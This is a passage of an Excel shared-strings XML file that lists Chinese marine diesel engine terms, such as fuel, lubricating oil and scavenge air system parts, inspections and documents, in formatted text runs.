      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油限制气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油消耗率</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油消耗率曲线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放箱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄漏报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄漏报警，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>LAH42</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油溢流管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油预备泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油增压泵，顶盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油增压泵，吸入阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油增压泵节流阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热传感器打孔方案</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热感应器孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热平衡</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热平衡冷却水</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热收缩套管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>人孔盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ANGLE STEEL SHARP EDGED</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>grating</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>？）</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>认可图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日本工业标准部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日用油柜，差异图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>容器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柔性钢管套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柔性螺旋护具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>如何退回备用件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>乳化器单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-WIF</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>乳化器单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软爆炸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬件密钥</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件及参数</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件许可证</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件专利，标准状况</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软磨石镀硬铬</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑，数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑点</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑和冷却油冲洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑和冷却油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑和冷却油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑剂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑器驱动装置壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑驱动销规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油，推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油补偿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油储油箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油储油箱总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油离心分油机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油流量</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油起动泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油清洁规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油系统图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油增压单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油自动过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塞尺</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塞尺销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三角板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三角式法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三角支承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通考克</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通考克清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通螺纹接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伞形挡油片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伞状泄放管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>散货船二冲程主机布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>散热冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管节流孔布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管警报</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空间灭火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空间灭火管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空间泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空冷器壳体</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气管的组装和安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气口检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气口检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报告</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气口检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拍照</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气口检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>评估</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气扣检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>迹象</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气排泄柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
